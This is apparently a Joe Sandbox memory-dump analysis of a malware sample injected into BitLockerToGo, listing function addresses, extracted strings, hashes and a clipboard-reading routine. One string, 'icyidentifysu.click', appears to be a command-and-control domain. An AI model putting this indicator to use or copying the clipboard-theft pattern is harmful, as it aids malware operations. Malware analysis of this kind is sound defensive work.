Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %$&$'$'$($*$+$,$-$0$0$2$3$4$5$6$8$:$:$<$>$@$@$@$A$B$B$C$D$D$D$D$D$F$F$H$H$J$J$J$J$K$L$L$N$N$N$P$Q$R$T$T$U$V$X$X$X$Y$Z$Z$Z$\$\$]$^$^$`$`$b$c$d$e$f$h$j$j$l$n$p$p$r$r$r$s$s$t$t$t$v$w$x$x$x$z$z$z$|$|$}$~$~$~$~
API String ID: 0-3890152117
Opcode ID: e639354a898ca8838342df1be7d5ca64642ae7dd44db16e609863bf6b92701ed
Instruction ID: 00a5c181d4688b4520d7e14e62f6e0c7e69488cdc509bcb9dfd089ea2845093f
Opcode Fuzzy Hash: e639354a898ca8838342df1be7d5ca64642ae7dd44db16e609863bf6b92701ed
Instruction Fuzzy Hash: 91139E7160C7C08ED325CB38C49439FBBD2ABD6324F188A6EE0E9873D2D6B985458717

Function 00423620 Relevance: 41.9, Strings: 33, Instructions: 662COMMON

Download Yara Rule

Strings

OLOr, xrefs: 004236BF
=_%A, xrefs: 00423D10
DuBw, xrefs: 00424040
v$f&, xrefs: 00423BC7
<[5], xrefs: 00423D06
PiRk, xrefs: 00424022
dUbW, xrefs: 00423FF0
27B, xrefs: 00423728
| v", xrefs: 00423BBD
~0g2, xrefs: 00423995
o#M%, xrefs: 00423CCA
Y%RV, xrefs: 00424390
o`, xrefs: 00423C5D
{I}K, xrefs: 00423FD2
W<B>, xrefs: 00423B8B
3df, xrefs: 00424171
=p#r, xrefs: 00423C35
A/6Q, xrefs: 00423CE8
e4b6, xrefs: 0042399F
JyF&, xrefs: 004240D9
a(E*, xrefs: 004239A9
dz, xrefs: 00423B09
2t#v, xrefs: 00423C3F
:`?b, xrefs: 00424167
+|)~, xrefs: 00423C2B
G,d., xrefs: 00423BB3
U%RV, xrefs: 0042435D
m]o_, xrefs: 00424004
!h>j, xrefs: 00423C49
N, xrefs: 0042396D
iYi[, xrefs: 00423FFA
1LOr, xrefs: 0042368C
@qCs, xrefs: 00424036

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !h>j$+|)~$1LOr$27B$2t#v$3df$:`?b$<[5]$=_%A$=p#r$@qCs$A/6Q$DuBw$G,d.$JyF&$N$OLOr$PiRk$U%RV$W<B>$Y%RV$a(E*$dUbW$dz$e4b6$iYi[$m]o_$o#M%$o`$v$f&${I}K$| v"$~0g2
API String ID: 0-907448966
Opcode ID: 906b106bb995ccb7d9f04af23aa9e046081a769930344912e196f36544a15b74
Instruction ID: 5b20557d9d7e8a4c1c7269f608f617b8376c5f086e9da68f6a73b240cd17ea09
Opcode Fuzzy Hash: 906b106bb995ccb7d9f04af23aa9e046081a769930344912e196f36544a15b74
Instruction Fuzzy Hash: 33625FB5D082698BDBA4CF159D8079DBBB0FB81300F6081E9C59D7B244CF396A86CF84

Function 00423790 Relevance: 39.3, Strings: 31, Instructions: 584COMMON

Download Yara Rule

Strings

=_%A, xrefs: 00423D10
DuBw, xrefs: 00424040
v$f&, xrefs: 00423BC7
<[5], xrefs: 00423D06
PiRk, xrefs: 00424022
dUbW, xrefs: 00423FF0
27B, xrefs: 00423728
| v", xrefs: 00423BBD
~0g2, xrefs: 00423995
o#M%, xrefs: 00423CCA
Y%RV, xrefs: 00424390
o`, xrefs: 00423C5D
{I}K, xrefs: 00423FD2
W<B>, xrefs: 00423B8B
3df, xrefs: 00424171
=p#r, xrefs: 00423C35
A/6Q, xrefs: 00423CE8
e4b6, xrefs: 0042399F
JyF&, xrefs: 004240D9
a(E*, xrefs: 004239A9
dz, xrefs: 00423B09
2t#v, xrefs: 00423C3F
:`?b, xrefs: 00424167
+|)~, xrefs: 00423C2B
G,d., xrefs: 00423BB3
U%RV, xrefs: 0042435D
m]o_, xrefs: 00424004
!h>j, xrefs: 00423C49
N, xrefs: 0042396D
iYi[, xrefs: 00423FFA
@qCs, xrefs: 00424036

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !h>j$+|)~$27B$2t#v$3df$:`?b$<[5]$=_%A$=p#r$@qCs$A/6Q$DuBw$G,d.$JyF&$N$PiRk$U%RV$W<B>$Y%RV$a(E*$dUbW$dz$e4b6$iYi[$m]o_$o#M%$o`$v$f&${I}K$| v"$~0g2
API String ID: 0-2591794845
Opcode ID: 6aa5b6f9f7ba1b089a148691db6d6baab2a59d6004fb3519fe6656bb4fd3f83b
Instruction ID: 207d3899a3b9cc48c82b4b29924bbcac42b420c80810afd572a5b18c355f736e
Opcode Fuzzy Hash: 6aa5b6f9f7ba1b089a148691db6d6baab2a59d6004fb3519fe6656bb4fd3f83b
Instruction Fuzzy Hash: 31523DB5D092698BDBA48F159D8039DBBB0FB41700F6092E9C49D7B244DB396A86CF84

Function 00431020 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 106clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431030
GetClipboardData.USER32 ref: 0043104B
GlobalLock.KERNEL32 ref: 0043106A
GetWindowLongW.USER32 ref: 004310BC
GlobalUnlock.KERNEL32 ref: 00431180
CloseClipboard.USER32 ref: 00431189

Strings

o, xrefs: 004310FF
t, xrefs: 004310DC
i, xrefs: 00431109
f, xrefs: 004310EB
z, xrefs: 004310D7
}, xrefs: 004310F5
y, xrefs: 004310E6
g, xrefs: 004310E1
j, xrefs: 004310F0
B, xrefs: 004310CD
~, xrefs: 004310D2

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: B$f$g$i$j$o$t$y$z$}$~
API String ID: 2832541153-3431088675
Opcode ID: 0160fd8d480660f35874ceb680c4164cf840f46fd641679df1f178a62e5b380e
Instruction ID: 2b5bc8521efa19f50317a139f46d1ceb2265f287572faca6612f44f9b77b85ae
Opcode Fuzzy Hash: 0160fd8d480660f35874ceb680c4164cf840f46fd641679df1f178a62e5b380e
Instruction Fuzzy Hash: 7B417CB050C3808ED301AF78D94935EBFE1AB9A308F09497EE5C986392D67D8558C767

Function 0040AE20 Relevance: 18.0, Strings: 14, Instructions: 485COMMON

Download Yara Rule

Strings

>t0, xrefs: 0040AF76
!~Cp, xrefs: 0040B016
G:<, xrefs: 0040AF6C
>f?x, xrefs: 0040B002
<Z9\, xrefs: 0040AFBC
Ab[d, xrefs: 0040AFF8
1B?D, xrefs: 0040AFA8
^nY`, xrefs: 0040AFEE
%RlT, xrefs: 0040AFD0
pJkL, xrefs: 0040AF94
`Vdh, xrefs: 0040AFDA
^jUl, xrefs: 0040AFE4
r&^8, xrefs: 0040AF62
-z&|, xrefs: 0040B00C

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: >t0$!~Cp$%RlT$-z&|$1B?D$<Z9\$>f?x$Ab[d$G:<$^jUl$^nY`$`Vdh$pJkL$r&^8
API String ID: 0-1663888199
Opcode ID: ec9d5ad6efa2e0e83d3a944f8f5fdcd0d6edd0840de8023ee4da326fa5a8889b
Instruction ID: 0f071aa952705e74209860cce06fa5e6359a398553a4f88fc65c3bdd75f4b665
Opcode Fuzzy Hash: ec9d5ad6efa2e0e83d3a944f8f5fdcd0d6edd0840de8023ee4da326fa5a8889b
Instruction Fuzzy Hash: 3A02BBB5200B01CFD3248F79D8557A7BBE1FB45310F148A2DE5AA9BBA0DBB4A405CF48

Function 0041D400 Relevance: 17.1, Strings: 13, Instructions: 881COMMON

Download Yara Rule

Strings

1nnh, xrefs: 0041D82D
_66N, xrefs: 0041D78E
[\V, xrefs: 0041D796
9./`, xrefs: 0041D7EE
lg, xrefs: 0041D838
w, xrefs: 0041DD5D
qcce, xrefs: 0041DAD0
*;, xrefs: 0041D7DE
GAWJ, xrefs: 0041D79E
dein, xrefs: 0041D76E
hl, xrefs: 0041DD56
U, xrefs: 0041DAD8
boaa, xrefs: 0041DAC8

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *;$1nnh$9./`$GAWJ$U$[\V$_66N$boaa$dein$hl$lg$qcce$w
API String ID: 0-714444217
Opcode ID: 3f2d1fac863bf35d4592e66923841910d621e31973831fa63d5a8e0d7de2c42e
Instruction ID: dd8b33ae5b7dd411e3d241eda01dfc98351f3dc95584a99a473f0adb86a77f16
Opcode Fuzzy Hash: 3f2d1fac863bf35d4592e66923841910d621e31973831fa63d5a8e0d7de2c42e
Instruction Fuzzy Hash: 3C524BB190C3508FC725DF28C8407AFBBE1AF96304F08867EE8E59B392D6399945C756

Function 00425E40 Relevance: 16.9, Strings: 13, Instructions: 669COMMON

Download Yara Rule

Strings

S1]3, xrefs: 004267A0
N)C+, xrefs: 0042678A
DE, xrefs: 004267D7
$A$C, xrefs: 004267CC
YRSG, xrefs: 0042647D
Q9];, xrefs: 004267B6
K-r/, xrefs: 00426795
-]^C, xrefs: 00426455, 00426466
ojgm, xrefs: 0042649D
K%H', xrefs: 00426782
Z5P7, xrefs: 004267AB
|!A#, xrefs: 00426826
]ZXD, xrefs: 00426485

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $A$C$-]^C$DE$K%H'$K-r/$N)C+$Q9];$S1]3$YRSG$Z5P7$]ZXD$ojgm$|!A#
API String ID: 0-1681748943
Opcode ID: f005c0901f789223cd58cc448166d20cff71cb87bd5f0fe4abff1d5146f5dd95
Instruction ID: f5ab92e2c547fcbf8ef1c11eaf796bbbc0b57f4f6981f81f49341ceaf64e483c
Opcode Fuzzy Hash: f005c0901f789223cd58cc448166d20cff71cb87bd5f0fe4abff1d5146f5dd95
Instruction Fuzzy Hash: 312267B16083908FD714DF29E85136BBBE1AFD6304F09883EE4D597352E639D905CB4A

Function 00436130 Relevance: 16.5, Strings: 13, Instructions: 232COMMON

Download Yara Rule

Strings

E, xrefs: 00436227
N, xrefs: 0043613F
0, xrefs: 00436300
N, xrefs: 004361AF
i, xrefs: 00436348
O, xrefs: 004361B4
*, xrefs: 00436305
@, xrefs: 00436236
N, xrefs: 00436231
I, xrefs: 0043622C
0, xrefs: 004361B9
0, xrefs: 00436149
O, xrefs: 00436144

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *$0$0$0$@$E$I$N$N$N$O$O$i
API String ID: 0-3060646418
Opcode ID: 24ffbdccd022407d96c599354f145125a10460cf7af2d15b326cb129a25b2bbc
Instruction ID: 1aa4e472f3ae3f3aee47da7b9406182ea4f50a438a28b0df4bfd1e2021d083d8
Opcode Fuzzy Hash: 24ffbdccd022407d96c599354f145125a10460cf7af2d15b326cb129a25b2bbc
Instruction Fuzzy Hash: 6181F72351D7D29AD311857C884425FAFD20BE7224F1EDAAEE8E58B3C2D56DC806C367

Function 00421CAB Relevance: 15.9, Strings: 12, Instructions: 894COMMON

Download Yara Rule

Strings

Y%RV, xrefs: 0042269A
U%RV, xrefs: 0042239D
Y%RV, xrefs: 00421D3A
U%RV, xrefs: 00422576
U%RV, xrefs: 00421F38
U%RV, xrefs: 00421CDE
Y%RV, xrefs: 00421F8A
U%RV, xrefs: 004222F7
Y%RV, xrefs: 0042234A
Y%RV, xrefs: 004225CA
U%RV, xrefs: 00422640
Y%RV, xrefs: 004223FA

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: U%RV$U%RV$U%RV$U%RV$U%RV$U%RV$Y%RV$Y%RV$Y%RV$Y%RV$Y%RV$Y%RV
API String ID: 0-3684172202
Opcode ID: adf0c2e9c633c089042a032d080fee9fb6394e7b4a1da8ee1e4d39c50c1df3b3
Instruction ID: 3b04f31993b6cd925e01e16ca2454c89d640cb841f72f26cd3d2d99b156ab46a
Opcode Fuzzy Hash: adf0c2e9c633c089042a032d080fee9fb6394e7b4a1da8ee1e4d39c50c1df3b3
Instruction Fuzzy Hash: 3B522276B01122DBCB18CF68DC506AEB7B2FB8A310F29817CD846A7394D7789D51CB84

Function 00424E40 Relevance: 12.8, Strings: 10, Instructions: 325COMMON

Download Yara Rule

Strings

m!C#, xrefs: 00425174
q=_?, xrefs: 0042515D
^1V3, xrefs: 00425145
CzE|, xrefs: 004250D0
DE, xrefs: 0042516D
[5A7, xrefs: 0042514D
)A.C, xrefs: 00425165
M%J', xrefs: 0042512D
rst, xrefs: 004250C6
{-G/, xrefs: 0042513D

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: rst$)A.C$CzE|$DE$M%J'$[5A7$^1V3$m!C#$q=_?${-G/
API String ID: 0-1133353913
Opcode ID: fc8610a4db3fcdaaf23b875d54acbd015691132519733419f9fbcf1efae46892
Instruction ID: 062e4c2e49ed4084361cfd2dc51809e3c57bf4f9607e9aeb51279615d27ce93a
Opcode Fuzzy Hash: fc8610a4db3fcdaaf23b875d54acbd015691132519733419f9fbcf1efae46892
Instruction Fuzzy Hash: 9B915772A083208BD714CF15D8913ABB7E1FFD5314F49892DE8CA9B390E7789904CB86

Function 0042AB00 Relevance: 12.8, Strings: 10, Instructions: 273COMMON

Download Yara Rule

Strings

'-*(, xrefs: 0042ABDB
jItK, xrefs: 0042ACC2
FKGy, xrefs: 0042ACE3
gI@C, xrefs: 0042ACF9
K\f, xrefs: 0042AC96
=eYy, xrefs: 0042AC21
ywHz, xrefs: 0042ACCD
q\, xrefs: 0042AD51
}H, xrefs: 0042ABE6
3h`k, xrefs: 0042ACB7

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: '-*($3h`k$=eYy$FKGy$gI@C$jItK$q\$ywHz$}H$K\f
API String ID: 0-699980088
Opcode ID: e4fe23e3a9ec83e9b1a25f114f9f27b367729d49da5817393f9aa6d9c58aa3d7
Instruction ID: 13a49d8df32935d409537d3b12d3d325300ae0da9a317c593ce4368713c7b2d3
Opcode Fuzzy Hash: e4fe23e3a9ec83e9b1a25f114f9f27b367729d49da5817393f9aa6d9c58aa3d7
Instruction Fuzzy Hash: A381E2B590C3E18BD7388F2594917ABBBD2AFD2304F19896DC8DD1B342C6390805CB97

Function 00417BFA Relevance: 10.6, Strings: 8, Instructions: 629COMMON

Download Yara Rule

Strings

fgx, xrefs: 00417C73
/^ P, xrefs: 00417C43
fWo, xrefs: 00418322
h]m_, xrefs: 0041805D
4V*h, xrefs: 00417C53
RaGc, xrefs: 00418065
6R!T, xrefs: 00417C4B
jWo, xrefs: 0041837A

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: fgx$/^ P$4V*h$6R!T$RaGc$fWo$h]m_$jWo
API String ID: 0-3660092546
Opcode ID: e7da89803c040491e4d2fe438a7d7a413fb54a49df1d932ccab013ebdb27bf06
Instruction ID: eb508a7ccd9695fc57cfbcc3df19fb92cf6cbc24581256188924ca0b1646c8cf
Opcode Fuzzy Hash: e7da89803c040491e4d2fe438a7d7a413fb54a49df1d932ccab013ebdb27bf06
Instruction Fuzzy Hash: AC2225766083118BC724CF28C8916ABB7F2FFC9754F198A6DE8C95B354E7388941C746

Function 00415A0E Relevance: 9.5, Strings: 7, Instructions: 707COMMON

Download Yara Rule

Strings

s, xrefs: 00415E33
gfff, xrefs: 00415B5F
B`A, xrefs: 00416032
P<?, xrefs: 00416140
7, xrefs: 00415B30
[)u, xrefs: 00415B56
+,, xrefs: 00415AC8

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: [)u$+,$7$B`A$P<?$gfff$s
API String ID: 0-3436754772
Opcode ID: 6d9b583597e22855f98ac2dc2515ea7d2d91de0a60f0dd18539040e276828374
Instruction ID: 6d10214af21920bb08381577f264cbe6c481156426303290986e2969e01ca657
Opcode Fuzzy Hash: 6d9b583597e22855f98ac2dc2515ea7d2d91de0a60f0dd18539040e276828374
Instruction Fuzzy Hash: F10236316087418FD724CF28D8907AB7BE2FBCA314F59862DE4C997392D7389945CB4A

Function 00435358 Relevance: 9.0, Strings: 7, Instructions: 204COMMON

Download Yara Rule

Strings

!, xrefs: 004353AF
#, xrefs: 004353BD
:, xrefs: 00435509
0, xrefs: 004354DE
%, xrefs: 004353CB
', xrefs: 004353D9
&, xrefs: 004353D2

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !$#$%$&$'$0$:
API String ID: 0-3914827830
Opcode ID: ebc53583afab1018e4d91692b1bac25d0461c118ee7cfed399b6fdddcf6ebe5f
Instruction ID: b019c84cf8af64b5314ff683ee125d45ff28dbf9c40a41cf0382342e2e8883d6
Opcode Fuzzy Hash: ebc53583afab1018e4d91692b1bac25d0461c118ee7cfed399b6fdddcf6ebe5f
Instruction Fuzzy Hash: DC912932D08AB98FCB25CA2CCC543DDBBB15B56324F1942EEC4A9673C2C6744E858F85

Function 004192F0 Relevance: 8.5, APIs: 2, Strings: 2, Instructions: 1510COMMON

Download Yara Rule

APIs

Part of subcall function 0043B1C0: LdrInitializeThunk.NTDLL(0043D3E8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B1EE

FreeLibrary.KERNEL32(?), ref: 0041998A
FreeLibrary.KERNEL32(?), ref: 00419A1B

Strings

GI, xrefs: 004196CD
*+, xrefs: 004197CD

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: *+$GI
API String ID: 764372645-3106603203
Opcode ID: a0edb99b79fe52b678b56532b2e2bc10beeb045d480d98f0be9cd1fdf13272b3
Instruction ID: c5c4e280d43ba248472c341612864cb891257eec2a5ae9e7b1fbbb01ee1924c6
Opcode Fuzzy Hash: a0edb99b79fe52b678b56532b2e2bc10beeb045d480d98f0be9cd1fdf13272b3
Instruction Fuzzy Hash: 44A224317083405BD721CF68CC907ABBBA2AFC5354F28892DE5998B3A2D775DC85CB46

Function 0040C93E Relevance: 7.8, Strings: 6, Instructions: 300COMMON

Download Yara Rule

Strings

icyidentifysu.click, xrefs: 0040CCA9
G|, xrefs: 0040CB46
CC, xrefs: 0040CB4D
k{pm, xrefs: 0040CA02
ta`u, xrefs: 0040CA09
KG, xrefs: 0040CB3F

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: CC$G|$KG$icyidentifysu.click$k{pm$ta`u
API String ID: 0-708724105
Opcode ID: 4f253eed3f5f69b2ee2b82aa87d8c0b0c3e4401e760ee46f82dce1e29cf8ef6c
Instruction ID: 20d41328c34446dd9aef344bb0e1a8efa5e2f47056c53e3d15000b74550e283f
Opcode Fuzzy Hash: 4f253eed3f5f69b2ee2b82aa87d8c0b0c3e4401e760ee46f82dce1e29cf8ef6c
Instruction Fuzzy Hash: DEA1D0B12017418FD319CF29C491B62BBE2EF96304B2985AED0979F7A2C778D802CF55

Function 00427E16 Relevance: 6.7, Strings: 5, Instructions: 497COMMON

Download Yara Rule

Strings

c8[:, xrefs: 00428264
EW, xrefs: 00428175
D_, xrefs: 00428183
HY, xrefs: 0042817C
HY, xrefs: 004281D7, 004282BD, 00428397

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: D_$EW$HY$HY$c8[:
API String ID: 0-707503002
Opcode ID: 02345c6d571df1dd11e13c004ba1aea8720a1f96eb7346d2109cfc41cd1b79d1
Instruction ID: f25270122beee34f42c382278f46ba8f34327bf83344a6fa77f9d714242467c6
Opcode Fuzzy Hash: 02345c6d571df1dd11e13c004ba1aea8720a1f96eb7346d2109cfc41cd1b79d1
Instruction Fuzzy Hash: DBE15775E012218BCB10CF58C8406BAB7F2FF9A314F69819DD8816F755E739AC42CB94

Function 0040A930 Relevance: 6.6, Strings: 5, Instructions: 391COMMON

Download Yara Rule

Strings

RS, xrefs: 0040AB0E
uEys, xrefs: 0040AC9B
%#=9, xrefs: 0040A942
GI, xrefs: 0040AA51
$%3U, xrefs: 0040A9A2, 0040AB4D

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $%3U$%#=9$RS$uEys$GI
API String ID: 0-2673618240
Opcode ID: 490fd98fff3a4a64324741264c6ca45d0b3958b461d587d37644ac69862b36ed
Instruction ID: 296d1060e1b3532aed0a09c8760e07f3ddd1c134af8f69996ff820726ff39136
Opcode Fuzzy Hash: 490fd98fff3a4a64324741264c6ca45d0b3958b461d587d37644ac69862b36ed
Instruction Fuzzy Hash: B0C1347164C3918BD314CF28D49026FBBE2AFC6300F18892EE4D56B381D679895ACB87

Function 0041721A Relevance: 6.6, Strings: 5, Instructions: 322COMMON

Download Yara Rule

Strings

8Q, xrefs: 0041737E
;]jG, xrefs: 0041752F
WG, xrefs: 00417373
X], xrefs: 00417389
@]jG, xrefs: 00417560

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 8Q$;]jG$@]jG$WG$X]
API String ID: 0-742043631
Opcode ID: 782092d2386e64ad7d275fa235f22eb702d76247273d4ab77db1635aa68e9787
Instruction ID: 8091f01c0e019cd660b04e0784676016994b6f7f4e594aea3dcd47697573a214
Opcode Fuzzy Hash: 782092d2386e64ad7d275fa235f22eb702d76247273d4ab77db1635aa68e9787
Instruction Fuzzy Hash: C0C187B05183818BD335CF19C4917EBBBE1FF86314F14891DD4CA8B251EB789546CB96

Function 00409080 Relevance: 5.4, Strings: 4, Instructions: 422COMMON

Download Yara Rule

Strings

jrTW, xrefs: 00409445
v}, xrefs: 004090E0
w, xrefs: 00409244
[z, xrefs: 004091E7

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: [z$jrTW$v}$w
API String ID: 0-2493215026
Opcode ID: 12180ba4b0b725743f2b7951f9e97ea8ae81b2807934d80b04abb838223cd7e8
Instruction ID: 8656eb5187c6e4d52eb22cb8708b5f05e84ad9d0006bacdacbacfb1dfeb224e1
Opcode Fuzzy Hash: 12180ba4b0b725743f2b7951f9e97ea8ae81b2807934d80b04abb838223cd7e8
Instruction Fuzzy Hash: 7EB1F97150C3908BD319CB2984A03ABBFE29FD7304F58896DE4D65B3C6D6398D09CB96

Function 00414CF0 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

yr, xrefs: 00414F00
Fw, xrefs: 00414F16
(+, xrefs: 00414F75
xr, xrefs: 00414F0B

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: (+$Fw$xr$yr
API String ID: 0-4037305012
Opcode ID: 521df333026d6448c6bac9c628f4b0d4358329c21c9856930db27ace4531e3d8
Instruction ID: c52ffdc71f3c204c78f7f87ce5ea8d8c255bf6dd1e46c71402293293f9aeda6c
Opcode Fuzzy Hash: 521df333026d6448c6bac9c628f4b0d4358329c21c9856930db27ace4531e3d8
Instruction Fuzzy Hash: EDC1F3B1608340DBD7309F24DC85BABB7A0FFD5724F044A2DE9998B391E7388941C79A

Function 004094D0 Relevance: 5.4, Strings: 4, Instructions: 387COMMON

Download Yara Rule

Strings

~$A&, xrefs: 004097B8
$:'+, xrefs: 0040955F
B70FCA7B9A301B2DC683EA0F4CB0333A, xrefs: 00409579
CD, xrefs: 004097F8

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $:'+$B70FCA7B9A301B2DC683EA0F4CB0333A$CD$~$A&
API String ID: 0-3572739235
Opcode ID: d8f07f3b46f879c8fcc9d59f84a537cc67c9997dbc93c5a9b72b0331e43290b5
Instruction ID: 19e5cc09c4bccfc8c1e2bd8a47edc933c242acc168ce1e9223e8ccf287daec48
Opcode Fuzzy Hash: d8f07f3b46f879c8fcc9d59f84a537cc67c9997dbc93c5a9b72b0331e43290b5
Instruction Fuzzy Hash: 59B114B1A083408BD714CF35C84166BBBE2EFD2318F18892DE5D58B392D739C50ACB5A

Function 00426D93 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

"rB, xrefs: 0042721C
RnB, xrefs: 00426E4C, 00427294, 004272CE
tB, xrefs: 00427470

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "rB$RnB$tB
API String ID: 0-4216038165
Opcode ID: 194f4e7ea056f9dbf4dc3172a98edd4d498bfef096048f559264ef87dfea744a
Instruction ID: 5db433618846bbee7fbdea8b7d170a8d74a15166589cd4b7a37e776e253fe78c
Opcode Fuzzy Hash: 194f4e7ea056f9dbf4dc3172a98edd4d498bfef096048f559264ef87dfea744a
Instruction Fuzzy Hash: 7E325776A08391CFD310CF28E89072B77E2AFC6324F59866DE4955B3A1D7399C04CB96

Function 0041FC50 Relevance: 4.2, Strings: 3, Instructions: 419COMMON

Download Yara Rule

Strings

|~, xrefs: 0041FD97
+xz, xrefs: 0041FE17
|~+xz, xrefs: 00420005, 00420016

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +xz$|~$|~+xz
API String ID: 0-1674398901
Opcode ID: 01274263c0ecce3d35a03d44141a69670113512c221da472d3dda66ce547e122
Instruction ID: b710419fa9807c675cdca11690d141e1ac49870e402d67e11a2f4585279bbe7e
Opcode Fuzzy Hash: 01274263c0ecce3d35a03d44141a69670113512c221da472d3dda66ce547e122
Instruction Fuzzy Hash: 24C110715083108BD320CF18C8527ABB7F1FF92350F098A6DE5C69B3A5E7799845CB96

Function 00409582 Relevance: 4.1, Strings: 3, Instructions: 335COMMON

Download Yara Rule

Strings

